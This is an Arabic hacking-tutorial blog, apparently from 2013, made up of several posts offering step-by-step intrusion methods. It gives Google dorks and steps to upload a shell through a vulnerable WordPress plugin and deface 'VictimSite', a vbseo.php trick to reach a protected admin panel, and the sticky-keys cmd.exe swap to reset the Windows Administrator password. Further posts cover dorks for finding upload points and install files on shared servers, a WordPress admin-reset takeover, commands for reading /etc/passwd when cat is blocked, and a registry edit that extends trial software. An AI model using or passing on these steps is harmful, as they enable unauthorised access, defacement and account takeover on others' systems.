المشاركات الشائعة

d

Solo copea el codigo y dirigete a diseño/Html y pegas el codigo
Solo copea el codigo y dirigete a diseño/Html y pegas el codigo

لإستماع للقرأن الكريم

عدد ضيوف الموقع

sild

آخر التعليقات

‏إظهار الرسائل ذات التسميات دروس و شروحات. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات دروس و شروحات. إظهار كافة الرسائل

الأحد، 29 ديسمبر 2013

// طريقة تخطي السيف مود و الدوال الممنوعة //



// طريقة تخطي السيف مود و الدوال الممنوعة //


:!! Bypass safe mode and disable function by sH@rk Dz :!!

!:: الشرح مرفوع على قناتي ::!!:: لا تنسوا الإشتراك ::!

http://www.youtube.com/watch?v=lioasV4d_7k&feature=youtu.be





:!!تجاوز مراكز الرفع و تحميل الملفات الممنوعة :!!



:!!جاوز مراكز الرفع و تحميل الملفات الممنوعة :!!

http://www.youtube.com/watch?v=mKpPGBGYjHo

الشرح مرفوع على قناتي لا تنسوا الإستراك 
القناة لالإشتراك:
http://www.youtube.com/user/mrdos27/videos

الصفحة :
https://www.facebook.com/informatiquesp

الجمعة، 27 سبتمبر 2013

تخطي الجدار الناري للمنتدى عن طريق ثغرة بالـ vbseo.php

السلام عليكم ورحمه الله وبركاته

كيف حال الشباب ان شاء الله بخير

طبعا بعضنا يواجه مشكله لما يحصل على بيانات لـ منتدى ولا يستطيع الدخول للوحه التحكم يواجهه جدار ناري !!

اليوم شرحنا بسيط وهو تخطي جدار الناري للمنتدى تابعوا معي الشرح







طبعا هنا نلاحظ المسار هو admincp ....

نروح نمسح admincp من الرابط ونحط بعد الـ vb

vbseo.php?vbseourl=index.php&vbseorelpath=./admincp






طبعا الكود تغير فيه الـ admincp حسب مسار اللوحه الي عليها الجدار

وبكذا مبروك عليك تم فك الجدار الناري وتقدر تسجيل دخولك للوحه 

الأحد، 1 سبتمبر 2013

منع دخول المواقع الاباحية

السلام عليكم و رحمة الله تعالى و بركاته في هذا الدرس ان شاء الله ساريكم تطبيق جوجل شروم يمنع الدخول الى المواقع الاباحية. طبعا التطبيق مفيد جدا حيث انه يحمي عائلتك عن طريق رصد ملايين المواقع الاباحية  و منع دخولها. 



 اولا ندخل على هذا الرابط من هنا . ثم نضغط على ajouter à chrome  او اضافة الى شروم كما هو مبين في الصورة. -


ثم سينبثق لك لك جدول ثم ستضغط على ajouter او اضف




ثم ستنتضر ثانية فقط ريتما ينتهي التحميل .
و بهذا ستكون قد مت بحماية عائلتك من تلك المواقع.

كيف تعرف معلومات حاسوبك بشكل أدق


كثيرا منا لا يعرف كل معلومات حاسوبه الشخصي.إذن في هذه المقالة سأتطرق إلى طريقة معرفت جميع معلومات حاسوبك و بشكل دقيق.
نفتح قائمة Start

ثم نختار Run

ثم نكتب الامر التالى بها:
    
msinfo32




ستظهر لك صفحة مفيها جميع المعلومات حول حاسوبك



ننتظر منكم ردودكم.


الثلاثاء، 27 أغسطس 2013

WordPress Exploit







You Can Hack Thousands of WordPress Websites With This Exploit.
And Thousands of WordPress websites Are Vulnerable For This Attack 

Google Dorks For This WordPress Exploit.
Google Dork 1) “inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Google Dork 2) /wp-content/plugins/easy-comment-uploads/upload-form.php
Google Dork 3) Index of /wp-content/plugins/easy-comment-uploads


Step 1
Open Google.com and Enter Any One Google Dork which Given,

Step 2
Now select any Website of WordPress.And Go To This
URL
VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php

You'll Get Upload Option Here Posted Image
Now Upload Your Shell To Deface The Website ….

Step 3
And Now Check It Here
VictimSite.com/wp-content/uploads/2012/10/yourfilehere

سرقة حساب Adminstrator في الوندوز + اضافة حسابات







اذهب للمسار

C:/windows/system32

ابحث عن الملف المسمى cmd.exe 

انسخه وضعه على سطح المكتب

غير اسمه الى sethc.exe

اعد الملف الجديد لمساره السابق C:/windows/system32 ووافق على الاستبدال

الان سجل خروج من الحساب الحالي او "المضيف Guest" 

في شاشة اختيار يوزر الدخول اضغط على زر shift خمس مرات

الان ستفتح نافذه الدوس مع امتيازات الادمن 

اكتب هذا الامر NET USER ADMINISTRATOR 111

111 = اي باسوورد تريد

اضغط انتر

اغلق نافذة الدوس وادخل على حساب الادمن بالباسورد الذي وضعته بدل 111

لاضافة حساب جديد استخدم الامر NET USER XERO /ADD 

الأحد، 25 أغسطس 2013

دوركات مفيده بالاستهداف داخل السيرفر

سلام عليكم حبيت اطرح درس يفيد شريحة اخواني المبتدئين الي انا منهم والدرس عن كيفية البحث داخل السيرفر عن امور مفيده في الاختراق 

البحث عن المتغيرات في السيرفر
كود PHP:
id=  
كود PHP:
php?id=  
كود PHP:
id  
كود PHP:
cat=  
الهدف من البحث عن المتغيرات انه احتمال كبير تجد ثغرات امنيه مثل

sql
lfi
upload
xss


البحث عن مراكز الرفع في السيرفر

كود PHP:
upload  
كود PHP:
upload.php  
كود PHP:
up  
كود PHP:
download  
كود PHP:
مركز رفع  
كود PHP:
مركز تحميل  
الهدف من البحث ايجاد ثغره في مركز الرفع ومن ثم رفع الشل او التلاعب بواسطة التمبرر داتا او تخمين لوحة تحكم المركز ورفع الشل من داخله

البحث عن الوورد بريس في السيرفر 

كود PHP:
wordpress  
كود PHP:
powered by wordpress  
كود PHP:
wp  
كود PHP:
blog  
كود PHP:
مدونه  
الهدف من البحث فحص الاضافات المركبه على المدونه والبحث فيها عن الثغرات الامنيه او تخمين لوحة الادمن ورفع الشل من داخلها



البحث عن الجوملا في السيرفر 

كود PHP:
powered by joomla  
كود PHP:
joomla  
كود PHP:
index.php option=  
نفس الكلام الي ذكرناه عن الوورد بريس بالضبط

البحث عن اماكن الدخول ( اللوجنات )

كود PHP:
login  
كود PHP:
login.php  
كود PHP:
admin/login.php  
كود PHP:
admin  
كود PHP:
administrator  
الهدف من البحث تخمين لوحة الدخول او ايجاد ثغره امنيه في السكربت لان غالبا هذه السكربتات تكون خاصه ومصابه ومن ثم رفع الشل

البحث عن جميع سكربتات السيرفر

كود PHP:
powered by  
كود PHP:
desighned by  
الهدف طبعا تحميل السكربت على السيرفر المحلي وفحصه او فحص الموقع الي يستخدم السكربت باي برنامج يختص بالثغرات الامنيه على الوندوز او على لينكس

البحث عن ملفات التثبيت 

كود PHP:
install  
كود PHP:
install.php  
كود PHP:
wp-admin/install.php  
الهدف : احيانا صاحب الموقع ينسى ملف تنصيب السكربت دون حذفه ويقوم الهكر باعادة تثبيت السكربت والدخول الى لوحة التحكم ومن ثم رفع الشل

البحث عن المواقع المخترقه على السيرفر 

كود PHP:
hacked by  
كود PHP:
hacked  
كود PHP:
تم الاختراق  
كود PHP:
تم الدعس  
كود PHP:
تم التطويف  
طبعا اخر دوركين كثرو منها لو السيرفر سعودي  

الهدف من ايجاد المواقع المخترقه على السيرفر محاولة كشف شلات او اب لودات او باكدورات على الموقع من خلال فحص ملفاته والاستفاده منها في اختراق الهدف

البحث عن المواقع تحت الانشاء 

كود PHP:
coming soon  
كود PHP:
Under construction  
كود PHP:
تحت الانشاء  
كود PHP:
تحت الصيانه  
الهدف احيانا مثل هالمواقع يكون باسوورد السي بنل لها قابل للكسر فيمكن تخمينه وهذا يشكل خطر على النظام بطبيعة الحال او يكون ناسي ملف التثبيت او يضع رقم سري سهل للوحة دخول السكربت او يوجد ثغره في موقعه لم ينتبه لها بحكم ان الموقع حديث الانشاء

البحث عن شركة الاستضافه داخل السيرفر 

كود PHP:
powered by whmcompletesolution  
كود PHP:
 whmcompletesolution  
كود PHP:
whm  
كود PHP:
cart.php  
طيب وش الفايده لو حصلت شركة استضافه على السيرفر !
لو حصلت اي شركة ما راح تستفيد غير استفاده محدوده من خلال البحث عن ثغرات سكربت الوهم ومحاولة الاختراق او رفع الشل

بينما !

لو حصلت نفس شركة الاستضافه الي مستاجره السيرفر على نفس السيرفر هنا بيكون كلام اخر . لان لو قدرت توصل لها احتمال تصل الى الروت ومن ثم تسيطر على السيرفر كامل

هذا ما استطعت تقديمه لكم اليوم وارجو من الله عز وجل ان يوفقني واياكم لما يحب ويرضى

السبت، 24 أغسطس 2013

طريقة تجاوز تشفير باسووردات الووردبريس


كيفكم يا حبااااااااااااااااااااايب قلبى
ان شاء الله من تقدم الى تقدم فى هذا المنتدى العريق

اطرح لكم اليوم طريقة لتجاوز تشفير باسوردات الوورد بريس المعقدة

فلنبدا على بركة الله

الطريقة بسيطة وشغالة مليون فى الميه

1- روح لرابط الادمن

http://www.example.com/wp-admin


2- اضغط على فقدان كلمة المرور او Lost your password?
3- جيب ايميل الادمن او ممكن باليوزر نيم هتلتقيه موجود فى (
موجودة بجدول wp-user)

وبعد ما تطلب كلمة المرور

اعمل ريفريش وجيب كود من العامود user_activation_key

وادخل على الرابط دا :


http://www.example.com/wp-login.php?action=rp&key=123456789&login=adminusername




طبعا
adminusername=يوزر نيم الادمن
key=الكود اللي جبته من
user_activation_key


وبكدا انت تقدر تعمل باسورد جديد للادمن

تحياتى 

اخوكم فى الله

Bypass cat /etc/passwd

السلام عليكم

بدون مقدمات
لو واجهت عدم قرائة الأمر
cat /etc/passwd
جرب هده الأوامر 

========================

كود:
xxd /etc/passwd
rev /etc/passwd
tac /etc/passwd
more /etc/passwdless /etc/passwd

طريقة بسيطة لكسر البرامج التجريبيه

السلام عليكم ورحمة الله وبركاته

اليوم وانا اتصفح احدى المنتديات العربية وجدت طريقة بسيطة جدا لكسر حماية البرامج التجريبية
والاستفادة منها اكبر من المدة المحددة لها


كيف تكسر البرامج التجريبيه

كيف تستطيع أن تتحايل على البرنامج الذي يطلب له ملف كراك

تعتمد كثير من البرامج بوضع حماية على برامجها، و غالبا ما تكون هناك
فترة تجريبية للبرنامج مدة لا تتجاوز14 يوماً، و في حالة رغبة المستخدم 
بالتجديد عليه أن يشتري النسخة الاصلية، أو البحث عن ( كراك ) البرنامج
، و يقصد به الرقم التسلسي، الذي يمكنه من فتح النسخة.

فهل ترغب ان تزيد في مدة التجربة؟
فبدلا من 14 يوما ، تكون اكثر من 1400 يوم مثلا ؟ حسنا أليك الطريقه

1- اضغط على (start او ابدأ )حسب الويندوز اللي تملكه اذا كان عربي او انجليزي .
2- اختار( run )(أو تشغيل) .
3- اكتب في المربع (regedit)وبعدها اضغط على( موافق أو ok) .
4- سوف يشتغل برنامج للدخول الى سجلات الويندوز.
5- سوف تظهر لك خمسة مجلدات صفراء في الجهه اليسرى من الشاشه 
، اختر المجلد المكتوب امامه(HKEY_LOCAL_MASHINE)واضغط علامة(+) التي بجانبه .
6- سوف تظهر مجلدات كثيره بداخل المجلد المختار .
7- اختر مجلد( Software )واضغط علامة (+) التي بجانبه .
8- سوف تظهر مجلدات كثيره بداخله ، اختر مجلد (Microsoft) وبعدها مجلد (Windows) بنفس الطريقه طبعا.
9- اضغط على مجلد( Currentversion) سوف تظهر على يمين الشاشه عناصر كثيره .
10- ابحث بين العناصر عن العنصر( SSInstall) واضغط عليه بزر الفأره اليمين ثم اختر(modify).
11-ستظهر نافذه صغيره بها مربع مكتوب فيه قيمة ، واختيارين ( Hexdecimal , Deciaml ).
12 - اختر (Decimal )ستجد ان القيمه الموجوده بداخل المربع تغيرت ارقامها.
13- غير القيمه الموجوده بداخل المربع الى( 999999999 تسعة تسع مرات ).
وبعدها اضغط على (موافق) .

14- اغلق برنامج تحرير سجلات الويندوز وبعدها شغل البرنامج .